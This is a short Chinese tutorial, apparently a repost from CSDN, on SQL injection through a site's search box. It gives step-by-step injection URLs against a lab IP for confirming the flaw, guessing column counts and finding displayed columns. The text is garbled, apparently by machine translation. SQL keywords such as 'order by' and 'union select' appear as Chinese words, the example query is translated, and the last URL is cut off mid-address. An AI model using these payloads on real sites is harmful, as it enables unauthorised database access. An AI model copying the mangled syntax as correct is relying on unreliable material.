基本介绍
网站通常包含搜索功能,以帮助用户轻松查找网站上的资源。如果底层代码忽略搜索变量过滤,则通用搜索框可能存在搜索注入漏洞。常用的后台SQL语句有:如果这里的参数不经过过滤器直接加入到SQL语句中,注入方式与字符注入类似,但是这里需要进行如下操作:结束匹配为“%”。其余基本相同
从用户名如“%input%”的成员中选择*
注入流程
确定注入
http://192.168.244.128/sql_search.php?content=#普通页面
http://192.168.244.128/sql_search.php?content=%\’ and 1=1 # #普通页面
http://192.168.244.128/sql_search.php?content=%\’ and 1=2 # #显示异常
猜解字段
http://192.168.244.128/sql_search.php?content=%\’ 3 命令# #正常显示
http://192.168.244.128/sql_search.php?content=%\’ 4命令# #显示错误
确定回显位
http://192.168.244.128/sql_search.php?content=-1%\’ 连接选择1,2,3 #
查询库用户名
http://192.168.244
以上相关内容来源网络对#[漏洞挖掘]——101进行详细分析和搜索注入,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91267.html
